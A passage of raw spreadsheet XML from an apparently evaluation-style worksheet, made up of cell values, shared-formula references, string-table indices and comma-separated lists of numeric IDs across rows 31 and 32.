      <c r="BT31" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU31" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV31" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW31" s="104" t="s">
        <v>762</v>
      </c>
      <c r="BX31" s="104">
        <v>4.0</v>
      </c>
      <c r="BY31" s="104">
        <v>4.0</v>
      </c>
      <c r="BZ31" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA31" s="104" t="s">
        <v>651</v>
      </c>
      <c r="CB31" s="104">
        <v>4.0</v>
      </c>
      <c r="CC31" s="104">
        <v>4.0</v>
      </c>
      <c r="CD31" s="104" t="s">
        <v>651</v>
      </c>
      <c r="CE31" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF31" s="104" t="str">
        <f t="shared" si="73"/>
        <v>2034567, 2013028, 2019240</v>
      </c>
      <c r="CG31" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH31" s="104" t="s">
        <v>651</v>
      </c>
      <c r="CI31" s="104">
        <v>2044770.0</v>
      </c>
      <c r="CJ31" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK31" s="104">
        <v>1.0</v>
      </c>
      <c r="CL31" s="104">
        <v>1.0</v>
      </c>
      <c r="CM31" s="105">
        <v>2.0</v>
      </c>
      <c r="CN31" s="105">
        <v>2.0</v>
      </c>
      <c r="CO31" s="105">
        <v>3.0</v>
      </c>
      <c r="CP31" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ31" s="105">
        <v>4.0</v>
      </c>
      <c r="CR31" s="105">
        <v>4.0</v>
      </c>
      <c r="CS31" s="105">
        <v>1.0</v>
      </c>
      <c r="CT31" s="105">
        <v>0.0</v>
      </c>
      <c r="CU31" s="105">
        <v>1.0</v>
      </c>
      <c r="CV31" s="105">
        <v>1.0</v>
      </c>
      <c r="CW31" s="105">
        <v>2.0</v>
      </c>
      <c r="CX31" s="105">
        <v>3.0</v>
      </c>
      <c r="CY31" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ31" s="105">
        <v>4.0</v>
      </c>
      <c r="DA31" s="105">
        <v>4.0</v>
      </c>
      <c r="DB31" s="106">
        <f t="shared" si="15"/>
        <v>2</v>
      </c>
      <c r="DC31" s="106">
        <f t="shared" si="16"/>
        <v>2</v>
      </c>
      <c r="DD31" s="106">
        <f t="shared" si="17"/>
        <v>1</v>
      </c>
      <c r="DE31" s="106">
        <f t="shared" si="18"/>
        <v>3</v>
      </c>
      <c r="DF31" s="106">
        <f t="shared" si="19"/>
        <v>3</v>
      </c>
      <c r="DG31" s="106">
        <f t="shared" si="20"/>
        <v>1</v>
      </c>
      <c r="DH31" s="106">
        <f t="shared" si="21"/>
        <v>4</v>
      </c>
      <c r="DI31" s="106">
        <f t="shared" si="22"/>
        <v>4</v>
      </c>
      <c r="DJ31" s="106">
        <f t="shared" si="23"/>
        <v>1</v>
      </c>
      <c r="DK31" s="107">
        <f t="shared" si="77"/>
        <v>0.5</v>
      </c>
      <c r="DL31" s="106">
        <f t="shared" si="78"/>
        <v>1</v>
      </c>
      <c r="DM31" s="108" t="s">
        <v>763</v>
      </c>
      <c r="DN31" s="108">
        <v>5.0</v>
      </c>
      <c r="DO31" s="108">
        <v>5.0</v>
      </c>
      <c r="DP31" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ31" s="108" t="s">
        <v>763</v>
      </c>
      <c r="DR31" s="108">
        <v>5.0</v>
      </c>
      <c r="DS31" s="108">
        <v>5.0</v>
      </c>
      <c r="DT31" s="108" t="s">
        <v>764</v>
      </c>
      <c r="DU31" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV31" s="108" t="str">
        <f t="shared" si="85"/>
        <v>2034567, 2013028, 2019240, 50447</v>
      </c>
      <c r="DW31" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX31" s="108" t="s">
        <v>764</v>
      </c>
      <c r="DY31" s="108">
        <v>2044770.0</v>
      </c>
      <c r="DZ31" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA31" s="108">
        <v>1.0</v>
      </c>
      <c r="EB31" s="108">
        <v>1.0</v>
      </c>
      <c r="EC31" s="109">
        <v>2.0</v>
      </c>
      <c r="ED31" s="109">
        <v>2.0</v>
      </c>
      <c r="EE31" s="109">
        <v>4.0</v>
      </c>
      <c r="EF31" s="109">
        <v>1.0</v>
      </c>
      <c r="EG31" s="109">
        <v>4.0</v>
      </c>
      <c r="EH31" s="109">
        <v>5.0</v>
      </c>
      <c r="EI31" s="109">
        <v>1.0</v>
      </c>
      <c r="EJ31" s="109">
        <v>0.0</v>
      </c>
      <c r="EK31" s="109">
        <v>1.0</v>
      </c>
      <c r="EL31" s="109">
        <v>1.0</v>
      </c>
      <c r="EM31" s="109">
        <v>2.0</v>
      </c>
      <c r="EN31" s="109">
        <v>4.0</v>
      </c>
      <c r="EO31" s="109">
        <v>1.0</v>
      </c>
      <c r="EP31" s="109">
        <v>4.0</v>
      </c>
      <c r="EQ31" s="109">
        <v>5.0</v>
      </c>
      <c r="ER31" s="110">
        <f t="shared" si="27"/>
        <v>2</v>
      </c>
      <c r="ES31" s="110">
        <f t="shared" si="28"/>
        <v>2</v>
      </c>
      <c r="ET31" s="110">
        <f t="shared" si="29"/>
        <v>1</v>
      </c>
      <c r="EU31" s="110">
        <f t="shared" si="30"/>
        <v>4</v>
      </c>
      <c r="EV31" s="110">
        <f t="shared" si="31"/>
        <v>4</v>
      </c>
      <c r="EW31" s="110">
        <f t="shared" si="32"/>
        <v>1</v>
      </c>
      <c r="EX31" s="110">
        <f t="shared" si="33"/>
        <v>5</v>
      </c>
      <c r="EY31" s="110">
        <f t="shared" si="34"/>
        <v>5</v>
      </c>
      <c r="EZ31" s="110">
        <f t="shared" si="35"/>
        <v>1</v>
      </c>
      <c r="FA31" s="110">
        <f t="shared" si="79"/>
        <v>0.5</v>
      </c>
      <c r="FB31" s="110">
        <f t="shared" si="80"/>
        <v>1</v>
      </c>
      <c r="FC31" s="111" t="s">
        <v>765</v>
      </c>
      <c r="FD31" s="111">
        <v>10.0</v>
      </c>
      <c r="FE31" s="111">
        <v>12.0</v>
      </c>
      <c r="FF31" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG31" s="111" t="s">
        <v>766</v>
      </c>
      <c r="FH31" s="111">
        <v>8.0</v>
      </c>
      <c r="FI31" s="111">
        <v>9.0</v>
      </c>
      <c r="FJ31" s="111" t="s">
        <v>767</v>
      </c>
      <c r="FK31" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL31" s="111" t="str">
        <f t="shared" si="69"/>
        <v>50447, 2002752, 2002749, 2006409, 2034567, 2013028, 2002824, 2019240, 2101200</v>
      </c>
      <c r="FM31" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN31" s="111" t="s">
        <v>765</v>
      </c>
      <c r="FO31" s="111">
        <v>2044770.0</v>
      </c>
      <c r="FP31" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ31" s="111">
        <v>1.0</v>
      </c>
      <c r="FR31" s="111">
        <v>1.0</v>
      </c>
      <c r="FS31" s="112">
        <v>2.0</v>
      </c>
      <c r="FT31" s="112">
        <v>2.0</v>
      </c>
      <c r="FU31" s="112">
        <v>9.0</v>
      </c>
      <c r="FV31" s="112">
        <v>1.0</v>
      </c>
      <c r="FW31" s="112">
        <v>12.0</v>
      </c>
      <c r="FX31" s="112">
        <v>13.0</v>
      </c>
      <c r="FY31" s="112">
        <v>1.0</v>
      </c>
      <c r="FZ31" s="112">
        <v>0.0</v>
      </c>
      <c r="GA31" s="112">
        <v>1.0</v>
      </c>
      <c r="GB31" s="112">
        <v>1.0</v>
      </c>
      <c r="GC31" s="112">
        <v>2.0</v>
      </c>
      <c r="GD31" s="112">
        <v>7.0</v>
      </c>
      <c r="GE31" s="112">
        <v>1.0</v>
      </c>
      <c r="GF31" s="112">
        <v>8.0</v>
      </c>
      <c r="GG31" s="112">
        <v>9.0</v>
      </c>
      <c r="GH31" s="113">
        <f t="shared" si="39"/>
        <v>2</v>
      </c>
      <c r="GI31" s="113">
        <f t="shared" si="40"/>
        <v>2</v>
      </c>
      <c r="GJ31" s="113">
        <f t="shared" si="41"/>
        <v>1</v>
      </c>
      <c r="GK31" s="113">
        <f t="shared" si="42"/>
        <v>9</v>
      </c>
      <c r="GL31" s="113">
        <f t="shared" si="43"/>
        <v>7</v>
      </c>
      <c r="GM31" s="113">
        <f t="shared" si="44"/>
        <v>1</v>
      </c>
      <c r="GN31" s="113">
        <f t="shared" si="45"/>
        <v>13</v>
      </c>
      <c r="GO31" s="113">
        <f t="shared" si="46"/>
        <v>9</v>
      </c>
      <c r="GP31" s="113">
        <f t="shared" si="47"/>
        <v>1</v>
      </c>
      <c r="GQ31" s="114">
        <f t="shared" si="81"/>
        <v>0.5</v>
      </c>
      <c r="GR31" s="113">
        <f t="shared" si="82"/>
        <v>1</v>
      </c>
      <c r="GS31" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT31" s="94"/>
      <c r="GU31" s="147">
        <v>52676.0</v>
      </c>
      <c r="GV31" s="116">
        <v>1.0</v>
      </c>
      <c r="GW31" s="116">
        <v>3.0</v>
      </c>
      <c r="GX31" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY31" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ31" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA31" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB31" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC31" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD31" s="131">
        <v>52676.0</v>
      </c>
      <c r="HE31" s="131">
        <v>52676.0</v>
      </c>
      <c r="HF31" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG31" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH31" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI31" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ31" s="93" t="s">
        <v>768</v>
      </c>
      <c r="HK31" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL31" s="93">
        <v>2.0</v>
      </c>
      <c r="HM31" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN31" s="93">
        <v>0.0</v>
      </c>
      <c r="HO31" s="93">
        <v>0.0</v>
      </c>
      <c r="HP31" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ31" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR31" s="118">
        <f t="shared" si="54"/>
        <v>0.5</v>
      </c>
      <c r="HS31" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT31" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU31" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV31" s="140" t="s">
        <v>769</v>
      </c>
      <c r="HW31" s="119">
        <v>2.0</v>
      </c>
      <c r="HX31" s="119">
        <v>2.0</v>
      </c>
      <c r="HY31" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ31" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA31" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB31" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC31" s="120" t="str">
        <f>HV31</f>
        <v>86786, 86787</v>
      </c>
      <c r="ID31" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE31" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF31" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG31" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH31" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II31" s="99" t="s">
        <v>770</v>
      </c>
      <c r="IJ31" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK31" s="99">
        <v>4.0</v>
      </c>
      <c r="IL31" s="99">
        <v>0.0</v>
      </c>
      <c r="IM31" s="121">
        <f t="shared" si="57"/>
        <v>0</v>
      </c>
      <c r="IN31" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO31" s="98">
        <v>2.0</v>
      </c>
      <c r="IP31" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ31" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR31" s="118">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="IS31" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT31" s="127"/>
      <c r="IU31" s="127"/>
      <c r="IV31" s="127"/>
      <c r="IW31" s="127"/>
      <c r="IX31" s="127"/>
      <c r="IY31" s="127"/>
      <c r="IZ31" s="127"/>
      <c r="JA31" s="127"/>
      <c r="JB31" s="127"/>
      <c r="JC31" s="127"/>
      <c r="JD31" s="127"/>
      <c r="JE31" s="127"/>
      <c r="JF31" s="127"/>
      <c r="JG31" s="127"/>
      <c r="JH31" s="127"/>
      <c r="JI31" s="127"/>
      <c r="JJ31" s="127"/>
      <c r="JK31" s="127"/>
      <c r="JL31" s="127"/>
      <c r="JM31" s="127"/>
      <c r="JN31" s="127"/>
      <c r="JO31" s="127"/>
      <c r="JP31" s="127"/>
      <c r="JQ31" s="127"/>
      <c r="JR31" s="127"/>
      <c r="JS31" s="127"/>
      <c r="JT31" s="127"/>
      <c r="JU31" s="127"/>
      <c r="JV31" s="127"/>
      <c r="JW31" s="127"/>
      <c r="JX31" s="127"/>
      <c r="JY31" s="127"/>
      <c r="JZ31" s="127"/>
      <c r="KA31" s="127"/>
      <c r="KB31" s="127"/>
      <c r="KC31" s="127"/>
      <c r="KD31" s="127"/>
      <c r="KE31" s="127"/>
      <c r="KF31" s="127"/>
      <c r="KG31" s="127"/>
      <c r="KH31" s="127"/>
      <c r="KI31" s="127"/>
      <c r="KJ31" s="127"/>
      <c r="KK31" s="127"/>
      <c r="KL31" s="127"/>
      <c r="KM31" s="127"/>
      <c r="KN31" s="127"/>
      <c r="KO31" s="127"/>
      <c r="KP31" s="127"/>
      <c r="KQ31" s="127"/>
      <c r="KR31" s="127"/>
      <c r="KS31" s="127"/>
      <c r="KT31" s="127"/>
      <c r="KU31" s="127"/>
      <c r="KV31" s="127"/>
      <c r="KW31" s="127"/>
      <c r="KX31" s="127"/>
      <c r="KY31" s="127"/>
      <c r="KZ31" s="127"/>
      <c r="LA31" s="127"/>
      <c r="LB31" s="127"/>
      <c r="LC31" s="127"/>
      <c r="LD31" s="127"/>
      <c r="LE31" s="127"/>
      <c r="LF31" s="127"/>
      <c r="LG31" s="127"/>
      <c r="LH31" s="127"/>
      <c r="LI31" s="127"/>
      <c r="LJ31" s="127"/>
      <c r="LK31" s="127"/>
      <c r="LL31" s="127"/>
      <c r="LM31" s="127"/>
      <c r="LN31" s="127"/>
      <c r="LO31" s="127"/>
      <c r="LP31" s="127"/>
      <c r="LQ31" s="127"/>
      <c r="LR31" s="127"/>
      <c r="LS31" s="127"/>
      <c r="LT31" s="127"/>
      <c r="LU31" s="127"/>
      <c r="LV31" s="127"/>
      <c r="LW31" s="127"/>
      <c r="LX31" s="127"/>
      <c r="LY31" s="127"/>
      <c r="LZ31" s="127"/>
      <c r="MA31" s="127"/>
      <c r="MB31" s="127"/>
      <c r="MC31" s="127"/>
      <c r="MD31" s="127"/>
      <c r="ME31" s="127"/>
      <c r="MF31" s="127"/>
      <c r="MG31" s="127"/>
      <c r="MH31" s="127"/>
      <c r="MI31" s="127"/>
      <c r="MJ31" s="127"/>
      <c r="MK31" s="127"/>
      <c r="ML31" s="127"/>
      <c r="MM31" s="127"/>
      <c r="MN31" s="127"/>
      <c r="MO31" s="127"/>
      <c r="MP31" s="127"/>
      <c r="MQ31" s="127"/>
      <c r="MR31" s="127"/>
      <c r="MS31" s="127"/>
      <c r="MT31" s="127"/>
      <c r="MU31" s="127"/>
      <c r="MV31" s="127"/>
      <c r="MW31" s="127"/>
      <c r="MX31" s="127"/>
      <c r="MY31" s="127"/>
      <c r="MZ31" s="127"/>
      <c r="NA31" s="127"/>
      <c r="NB31" s="127"/>
      <c r="NC31" s="127"/>
      <c r="ND31" s="127"/>
      <c r="NE31" s="127"/>
      <c r="NF31" s="127"/>
      <c r="NG31" s="127"/>
      <c r="NH31" s="127"/>
      <c r="NI31" s="127"/>
      <c r="NJ31" s="127"/>
      <c r="NK31" s="127"/>
      <c r="NL31" s="127"/>
      <c r="NM31" s="127"/>
      <c r="NN31" s="127"/>
      <c r="NO31" s="127"/>
      <c r="NP31" s="127"/>
      <c r="NQ31" s="127"/>
      <c r="NR31" s="127"/>
      <c r="NS31" s="127"/>
      <c r="NT31" s="127"/>
      <c r="NU31" s="127"/>
      <c r="NV31" s="127"/>
      <c r="NW31" s="127"/>
      <c r="NX31" s="127"/>
      <c r="NY31" s="127"/>
    </row>
    <row r="32" ht="153.75" customHeight="1">
      <c r="B32" s="89" t="s">
        <v>209</v>
      </c>
      <c r="C32" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D32" s="90" t="s">
        <v>210</v>
      </c>
      <c r="E32" s="90" t="s">
        <v>771</v>
      </c>
      <c r="F32" s="90" t="s">
        <v>772</v>
      </c>
      <c r="G32" s="91" t="s">
        <v>773</v>
      </c>
      <c r="H32" s="90" t="s">
        <v>774</v>
      </c>
      <c r="I32" s="92" t="s">
        <v>775</v>
      </c>
      <c r="J32" s="92" t="s">
        <v>776</v>
      </c>
      <c r="K32" s="92" t="s">
        <v>777</v>
      </c>
      <c r="L32" s="93" t="s">
        <v>236</v>
      </c>
      <c r="M32" s="93">
        <v>2.0</v>
      </c>
      <c r="N32" s="93">
        <v>1.0</v>
      </c>
      <c r="O32" s="93">
        <v>1.0</v>
      </c>
      <c r="P32" s="93">
        <v>1.0</v>
      </c>
      <c r="Q32" s="93">
        <f t="shared" si="70"/>
        <v>2</v>
      </c>
      <c r="R32" s="93">
        <v>1.0</v>
      </c>
      <c r="S32" s="93">
        <v>1.0</v>
      </c>
      <c r="T32" s="94" t="s">
        <v>730</v>
      </c>
      <c r="U32" s="95" t="s">
        <v>219</v>
      </c>
      <c r="V32" s="96" t="s">
        <v>778</v>
      </c>
      <c r="W32" s="96" t="s">
        <v>12</v>
      </c>
      <c r="X32" s="97" t="s">
        <v>779</v>
      </c>
      <c r="Y32" s="96" t="s">
        <v>780</v>
      </c>
      <c r="Z32" s="96" t="s">
        <v>781</v>
      </c>
      <c r="AA32" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB32" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC32" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AD32" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE32" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF32" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG32" s="98" t="s">
        <v>306</v>
      </c>
      <c r="AH32" s="99" t="s">
        <v>782</v>
      </c>
      <c r="AI32" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ32" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AK32" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL32" s="100">
        <v>0.0</v>
      </c>
      <c r="AM32" s="100">
        <v>0.0</v>
      </c>
      <c r="AN32" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO32" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP32" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ32" s="100">
        <v>0.0</v>
      </c>
      <c r="AR32" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS32" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT32" s="100" t="str">
        <f t="shared" si="86"/>
        <v>-</v>
      </c>
      <c r="AU32" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV32" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW32" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX32" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY32" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ32" s="100">
        <v>0.0</v>
      </c>
      <c r="BA32" s="102">
        <v>2.0</v>
      </c>
      <c r="BB32" s="102">
        <v>0.0</v>
      </c>
      <c r="BC32" s="102">
        <v>0.0</v>
      </c>
      <c r="BD32" s="102">
        <v>0.0</v>
      </c>
      <c r="BE32" s="102">
        <v>0.0</v>
      </c>
      <c r="BF32" s="102">
        <v>0.0</v>
      </c>
      <c r="BG32" s="102">
        <v>0.0</v>
      </c>
      <c r="BH32" s="102">
        <v>0.0</v>
      </c>
      <c r="BI32" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ32" s="102">
        <v>0.0</v>
      </c>
      <c r="BK32" s="102">
        <v>0.0</v>
      </c>
      <c r="BL32" s="103">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BM32" s="103">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="BN32" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO32" s="103">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="BP32" s="103">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="BQ32" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR32" s="103">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="BS32" s="103">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="BT32" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU32" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV32" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW32" s="134" t="s">
        <v>383</v>
      </c>
      <c r="BX32" s="104">
        <v>2.0</v>
      </c>
      <c r="BY32" s="104">
        <v>2.0</v>
      </c>
      <c r="BZ32" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA32" s="134" t="s">
        <v>383</v>
      </c>
      <c r="CB32" s="104">
        <v>2.0</v>
      </c>
      <c r="CC32" s="104">
        <v>2.0</v>
      </c>
      <c r="CD32" s="134" t="s">
        <v>383</v>
      </c>
      <c r="CE32" s="134" t="s">
        <v>12</v>
      </c>
      <c r="CF32" s="104" t="str">
        <f t="shared" si="73"/>
        <v>2027792, 2027793</v>
      </c>
      <c r="CG32" s="134" t="s">
        <v>383</v>
      </c>
      <c r="CH32" s="134" t="s">
        <v>12</v>
      </c>
      <c r="CI32" s="134" t="s">
        <v>12</v>
      </c>
      <c r="CJ32" s="134" t="s">
        <v>12</v>
      </c>
      <c r="CK32" s="104">
        <v>0.0</v>
      </c>
      <c r="CL32" s="104">
        <v>0.0</v>
      </c>
      <c r="CM32" s="105">
        <v>2.0</v>
      </c>
      <c r="CN32" s="105">
        <v>1.0</v>
      </c>
      <c r="CO32" s="105">
        <v>2.0</v>
      </c>
      <c r="CP32" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ32" s="105">
        <v>2.0</v>
      </c>
      <c r="CR32" s="105">
        <v>2.0</v>
      </c>
      <c r="CS32" s="105">
        <v>0.0</v>
      </c>
      <c r="CT32" s="105">
        <v>1.0</v>
      </c>
      <c r="CU32" s="105">
        <v>0.0</v>
      </c>
      <c r="CV32" s="105">
        <v>0.0</v>
      </c>
      <c r="CW32" s="105">
        <v>1.0</v>
      </c>
      <c r="CX32" s="105">
        <v>2.0</v>
      </c>
      <c r="CY32" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ32" s="105">
        <v>2.0</v>
      </c>
      <c r="DA32" s="105">
        <v>2.0</v>
      </c>
      <c r="DB32" s="106">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="DC32" s="106">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="DD32" s="106">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="DE32" s="106">
        <f t="shared" si="18"/>
        <v>2</v>
      </c>
      <c r="DF32" s="106">
        <f t="shared" si="19"/>
        <v>2</v>
      </c>
      <c r="DG32" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH32" s="106">
        <f t="shared" si="21"/>
        <v>2</v>
      </c>
      <c r="DI32" s="106">
        <f t="shared" si="22"/>
        <v>2</v>
      </c>
      <c r="DJ32" s="106">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="DK32" s="107">
        <f t="shared" si="77"/>
        <v>0.5</v>
      </c>
      <c r="DL32" s="106">
        <f t="shared" si="78"/>
        <v>1</v>
      </c>
      <c r="DM32" s="135" t="s">
        <v>383</v>
      </c>
      <c r="DN32" s="108">
        <v>2.0</v>
      </c>
      <c r="DO32" s="108">
        <v>2.0</v>
      </c>
      <c r="DP32" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ32" s="135" t="s">
        <v>383</v>
      </c>
      <c r="DR32" s="108">
        <v>2.0</v>
      </c>
      <c r="DS32" s="108">
        <v>2.0</v>
      </c>
      <c r="DT32" s="135" t="s">
        <v>383</v>
      </c>
      <c r="DU32" s="135" t="s">
        <v>12</v>
      </c>
      <c r="DV32" s="108" t="str">
        <f t="shared" si="85"/>
        <v>2027792, 2027793</v>
      </c>
      <c r="DW32" s="135" t="s">
        <v>383</v>
      </c>
      <c r="DX32" s="135" t="s">
        <v>12</v>
      </c>
      <c r="DY32" s="135" t="s">
        <v>12</v>
      </c>
      <c r="DZ32" s="135" t="s">
        <v>12</v>
      </c>
      <c r="EA32" s="108">
        <v>0.0</v>
      </c>
      <c r="EB32" s="108">
        <v>0.0</v>
      </c>
      <c r="EC32" s="109">
        <v>2.0</v>
      </c>
      <c r="ED32" s="109">
        <v>1.0</v>
      </c>
      <c r="EE32" s="109">
        <v>2.0</v>
      </c>
      <c r="EF32" s="109">
        <v>0.0</v>
      </c>
      <c r="EG32" s="109">
        <v>2.0</v>
      </c>
      <c r="EH32" s="109">
        <v>2.0</v>
      </c>
      <c r="EI32" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ32" s="109">
        <v>1.0</v>
      </c>
      <c r="EK32" s="109">
        <v>0.0</v>
      </c>
      <c r="EL32" s="109">
        <v>0.0</v>
      </c>
      <c r="EM32" s="109">
        <v>1.0</v>
      </c>
      <c r="EN32" s="109">
        <v>2.0</v>
      </c>
      <c r="EO32" s="109">
        <v>0.0</v>
      </c>
      <c r="EP32" s="109">
        <v>2.0</v>
      </c>
      <c r="EQ32" s="109">
        <v>2.0</v>
      </c>
      <c r="ER32" s="110">
        <f t="shared" si="27"/>
        <v>1</v>
      </c>
      <c r="ES32" s="110">
        <f t="shared" si="28"/>
        <v>1</v>
      </c>
      <c r="ET32" s="110">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="EU32" s="110">
        <f t="shared" si="30"/>
        <v>2</v>
      </c>
      <c r="EV32" s="110">
        <f t="shared" si="31"/>
        <v>2</v>
      </c>
      <c r="EW32" s="110">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="EX32" s="110">
        <f t="shared" si="33"/>
        <v>2</v>
      </c>
      <c r="EY32" s="110">
        <f t="shared" si="34"/>
        <v>2</v>
      </c>
      <c r="EZ32" s="110">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="FA32" s="110">
        <f t="shared" si="79"/>
        <v>0.5</v>
      </c>
      <c r="FB32" s="110">
        <f t="shared" si="80"/>
        <v>1</v>
      </c>
      <c r="FC32" s="111" t="s">
        <v>783</v>
      </c>
      <c r="FD32" s="111">
        <v>5.0</v>
      </c>
      <c r="FE32" s="111">
        <v>6.0</v>
      </c>
      <c r="FF32" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG32" s="111" t="s">
        <v>784</v>
      </c>
      <c r="FH32" s="111">
        <v>3.0</v>
      </c>
      <c r="FI32" s="111">
        <v>3.0</v>
      </c>
      <c r="FJ32" s="111" t="s">
        <v>785</v>
      </c>
      <c r="FK32" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL32" s="111" t="str">
        <f t="shared" si="69"/>
        <v>2027792, 2027793, 2002752, 2002749, 2100628</v>
      </c>
      <c r="FM32" s="136" t="s">
        <v>383</v>
      </c>
      <c r="FN32" s="111" t="s">
        <v>786</v>
      </c>
      <c r="FO32" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP32" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ32" s="111">
        <v>0.0</v>
      </c>
      <c r="FR32" s="111">
        <v>0.0</v>
      </c>
      <c r="FS32" s="112">
        <v>2.0</v>
      </c>
      <c r="FT32" s="112">
        <v>2.0</v>
      </c>
      <c r="FU32" s="112">
        <v>5.0</v>
      </c>
      <c r="FV32" s="112">
        <v>0.0</v>
      </c>
      <c r="FW32" s="112">
        <v>6.0</v>
      </c>
      <c r="FX32" s="112">
        <v>6.0</v>
      </c>
      <c r="FY32" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ32" s="112">
        <v>1.0</v>
      </c>
      <c r="GA32" s="112">
        <v>0.0</v>
      </c>
      <c r="GB32" s="112">
        <v>0.0</v>
      </c>
      <c r="GC32" s="112">
        <v>2.0</v>
      </c>
      <c r="GD32" s="112">
        <v>3.0</v>
      </c>
      <c r="GE32" s="112">
        <v>0.0</v>
      </c>
      <c r="GF32" s="112">
        <v>3.0</v>
      </c>
      <c r="GG32" s="112">
        <v>3.0</v>
      </c>
      <c r="GH32" s="113">
        <f t="shared" si="39"/>
        <v>2</v>
      </c>
      <c r="GI32" s="113">
        <f t="shared" si="40"/>
        <v>2</v>
      </c>
      <c r="GJ32" s="113">
        <f t="shared" si="41"/>
